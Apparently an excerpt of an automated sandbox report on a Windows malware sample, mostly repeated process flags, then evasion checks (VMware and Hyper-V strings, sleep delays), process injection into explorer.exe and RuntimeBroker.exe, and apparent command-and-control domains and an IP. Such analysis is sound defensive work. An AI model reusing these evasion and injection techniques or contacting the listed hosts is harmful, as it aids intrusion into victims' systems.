                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLLCR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4875
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4102
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4861
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 00000030.00000000.1053923810.000001DA49E59000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
                      Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn
                      Source: explorer.exe, 0000001C.00000000.881750747.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                      Source: RuntimeBroker.exe, 00000025.00000000.976191564.0000027D4E762000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                      Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB37F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_009737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: init.icecreambob.com
                      Source: C:\Windows\explorer.exeDomain query: art.microsoftsofymicrosoftsoft.at
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.147.86.221 80
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
                      Compiles code for process injection (via .Net compiler)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.csJump to dropped file
                      Allocates memory in foreign processesShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 9D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 660000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 2D2D64A0000 protect: page execute and read and write
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
                      Source: C:\Windows\System32\control.exeThread created: unknown EIP: BD4F1580
